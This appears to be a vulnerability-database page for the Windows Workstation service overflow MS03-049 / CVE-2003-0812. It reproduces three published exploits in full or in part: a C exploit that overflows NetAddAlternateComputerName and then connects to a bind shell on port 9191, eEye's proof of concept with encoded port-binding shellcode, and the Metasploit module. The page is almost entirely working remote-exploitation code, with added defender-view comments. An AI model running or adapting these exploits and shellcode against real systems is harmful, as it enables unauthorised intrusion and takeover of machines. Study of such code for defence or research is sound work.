if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
/* Copies h_length bytes into `ipaddr` without checking that it fits. */
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
// ************************************* CMD *****************************
/*
* Ripped from TESO code and modifed by ey4s for win32
*/
void cmdshell2(int sock) {
/*
 * Relay loop between the connected socket and this process's stdin/stdout.
 * Returns to the caller, after printing a message, as soon as any
 * recv/write/read/send call reports zero or an error.
 */
int l;
char buf[1000];
struct timeval time;
unsigned long ul[2];
time.tv_sec=RECVTIMEOUT;
time.tv_usec=0;
while (1) {
/* Hand-built stand-in for an fd_set holding one socket: a count of 1, then the handle.
   Presumably relies on the Winsock fd_set layout - confirm. */
ul[0]=1;
ul[1]=sock;
/* Wait up to RECVTIMEOUT seconds for the socket to become readable. */
l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
/* Socket -> stdout (fd 1). */
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=write(1,buf,l);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
else {
/* Nothing readable within the timeout (or select failed): block on stdin (fd 0)
   and forward what was read. Pending socket data is not drained while blocked here. */
l=read(0,buf,sizeof(buf));
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=send(sock,buf,l,0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
}
}
/****************************************************************/
/*
 * Open an anonymous session to the share named in the global `ipc` and call
 * NetAddAlternateComputerName against the host in `tgt_net_uni`, passing the
 * global `expl_uni` as the alternate name. Started on its own thread by main().
 *
 * Defender view: the network-visible sequence is an IPC$ connection with an
 * empty user name and password followed by a request carrying a
 * multi-kilobyte computer name. MS03-049 is the vendor fix referenced on this
 * page; restricting anonymous (null) sessions and filtering SMB from untrusted
 * networks remove the precondition.
 */
void send_exp() {
NETRESOURCE _IPC_;
_IPC_.lpLocalName = NULL;
_IPC_.lpProvider = NULL;
_IPC_.dwType = RESOURCETYPE_ANY;
_IPC_.lpRemoteName = (char*)&ipc;
printf("[+] Setting up IPC$ session...\n");
/* Empty password and empty user name: an anonymous ("null") session. */
if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) {
printf("[x] Couldn't establish IPC$ connection.\n");
exit (1);
}
printf("[*] IPC$ session setup successfully!\n");
printf("[+] Sending exploit ...\n");
/* The call's outcome is not examined (the local prototype declares it void). */
NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0);
// ka-a-a b0-0-0-ms //
}
// ***************************************************************
/*
 * Entry point: parse -h/-t, assemble the request string in `expl`, convert it
 * to wide characters, start send_exp() on a worker thread, then connect to
 * TCP port 9191 on the same host and hand the socket to cmdshell2().
 */
int main(int argc,char *argv[])
{
WSADATA wsdata;
int sock;
unsigned short port = 9191;
struct sockaddr_in target;
unsigned long ip;
char opt;
/* Local int that shadows the global struct instance of the same name. */
int tgt_type = 0;
char *tgt_host;
if (argc<2) { usage(argv[0]); }
/* "v" is accepted by the option string but has no case of its own, so it falls into default. */
while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
switch(opt)
{
case 'h':
tgt_host = optarg;
/* NOTE(review): the limit of 127 exceeds the 30-byte size of tgt_net and ipc. */
snprintf(tgt_net,127, "\\\\%s", optarg);
snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
break;
case 't':
tgt_type = atoi(optarg);
/* Entry count is computed as sizeof(targets)/8, i.e. it assumes an 8-byte struct. */
if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
showtargets();
}
break;
default:
usage(argv[0]);
break;
}
}
printf("\n[+] Prepare exploit string\n");
/* Layout of expl[]: 2064 bytes of 0x41, with the 4-byte target address written
   over offset 2044, followed by the payload array starting at offset 2064. */
memset(expl, 0x00, sizeof(expl));
memset(expl, 0x41, 2064);
memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
//memcpy(&expl[2044], "BBBB", 4);
memcpy(&expl[2064], shellcode, sizeof(shellcode)); // begin shellcode here
memset(expl_uni, 0x00, sizeof(expl_uni));
memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));
/* The narrow-to-wide conversion routine is chosen per target type; the author's
   own comments below give the reason. */
switch(tgt_type) {
case 1:
case 3:
MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
break;
case 2:
mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
break;
default:
mbstowcs(expl_uni, expl, sizeof(expl));
break;
}
/* The request is sent from a worker thread; its handle is not kept or checked. */
beginthread(send_exp,0,NULL);
printf("[+] Sleep at 2s ... \n");
sleep(2000);
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return 1;
}
printf("[+] Initialize WSAStartup - OK\n");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized - OK\n");
ip=gimmeip(tgt_host);
memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = ip;
target.sin_port=htons(port);
printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);
/* A single connection attempt; on failure the socket is not closed before exit. */
if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
cmdshell2(sock);
closesocket(sock);
WSACleanup();
return 0;
}
// milw0rm.com [2003-12-04]
Exploit Database EDB-ID : 119
Date de publication : 2003-11-11 23h00 +00:00
Auteur : eEYe
EDB Vérifié : Yes
/*
Proof of concept for MS03-049.
This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
to work *only* with that (it will probably crash the the other 2Ks, no clue
about XPs).
To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
this public version, do not bother to ask.
Credits go to eEye
See original bulletin for more information, it is very well documented.
*/
#include <stdio.h>
#include <win.h>
#include <string.h>
/* Signature used in main() to call the netapi32 export resolved with GetProcAddress. */
typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);
/* Size in bytes of the request buffer built in main(). */
#define SIZE 2048
// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25";
unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload
/*
 * Proof of concept with everything hard-coded: opens an anonymous IPC$ session
 * to 192.168.175.3, resolves NetValidateName from netapi32, builds a 2048-byte
 * request buffer and passes it as the name argument, then tears the session
 * down. Returns 1 if session setup, LoadLibrary or GetProcAddress fails,
 * otherwise 0; the result of the remote call itself is not examined.
 */
int main(void)
{
int ret;
HINSTANCE hInstance;
MYPROC procAddress;
char szBuffer[SIZE];
NETRESOURCE netResource;
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName = "\\\\192.168.175.3\\ipc$";
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failed\n");
return 1;
}
hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
/* Returns with the IPC$ connection opened above still in place. */
fprintf(stderr, "[-] LoadLibrary failed\n");
return 1;
}
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
/* Returns without FreeLibrary() or cancelling the IPC$ connection. */
fprintf(stderr, "[-] GetProcAddress failed\n");
return 1;
}
/* Buffer layout: filled with 0x90, payload array (without its terminating NUL)
   at offset 1400, one 32-bit address at offset 2017, and the 5-byte jmp
   sequence plus its NUL at offset 2033. */
memset(szBuffer, 0x90, sizeof(szBuffer));
memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
// ebp @ &szBuffer[2013]
*(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, use opcode search engine for more, but
// be aware that a call esp will change the offset in the stack)
memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
/* szBuffer is a char array passed where the typedef expects a wide string. */
ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0);
WNetCancelConnection2("\\\\192.168.175.3\\ipc$", 0, TRUE);
FreeLibrary(hInstance);
return 0;
}
// milw0rm.com [2003-11-12]
Exploit Database EDB-ID : 16378
Date de publication : 2010-05-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Framework module for the NetAddAlternateComputerName overflow tracked as
# CVE-2003-0812 / MS03-049 (see 'References' below). It mixes in the
# framework's DCERPC and SMB helpers and defines two methods: initialize,
# which registers metadata and options, and exploit, which builds and sends
# one RPC request.
#
# Defender view: the request is identifiable on the wire by the interface UUID
# and operation number used in #exploit together with a name argument of 5000
# characters; MS03-049 is the vendor fix listed in the references.
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
# Registers the module metadata (name, references, payload constraints, the
# single target) and the SMBPIPE option, which defaults to 'BROWSER'.
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName
function using the Workstation service in Windows XP.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2003-0812' ],
[ 'OSVDB', '11461' ],
[ 'BID', '9011' ],
[ 'MSB', 'MS03-049' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
# Payload constraints: at most 1000 bytes, and none of the listed byte values
# (which include NUL and the whole 0x80-0x9f range).
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'),
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Windows XP SP0/SP1',
{
'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll
}
],
],
'DisclosureDate' => 'Nov 11 2003'))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']),
], self.class)
end
# Connects and logs in over SMB, binds to the RPC interface on the configured
# named pipe, marshals the request and issues one call. A missing response or
# a pipe-disconnected error is treated as expected; any other error is re-raised.
def exploit
connect()
smb_login()
# Interface UUID and version 1.0 over the named-pipe transport (ncacn_np);
# presumably the Workstation service interface, per the module name - confirm.
handle = dcerpc_handle(
'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
print_status("Building the stub data...")
# 5000 random alphanumeric characters, then fixed-offset overwrites: the target
# address as a little-endian 32-bit value at 3496, two bytes at 3492, five
# bytes at 3500, and the encoded payload at the start of the string.
name = rand_text_alphanumeric(5000)
name[3496, 4] = [target.ret].pack('V')
name[3492, 2] = "\xeb\x06"
name[3500, 5] = "\xe9" + [-3505].pack('V')
name[0, payload.encoded.length] = payload.encoded
# NDR-marshalled arguments: random 32-bit values interleaved with the server
# name, the oversized name and an empty string, followed by two zero longs.
stub =
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString(name) +
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(0) +
NDR.long(0)
print_status("Calling the vulnerable function...")
begin
# Operation number 0x1b on the bound interface.
dcerpc.call(0x1b, stub)
# No response from the server is swallowed silently.
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
rescue => e
# Anything other than a pipe-disconnected status is re-raised to the caller.
if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
raise e
end
end
# Cleanup
handler
disconnect
end
end
Products Mentioned
Configuration 0 Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
Références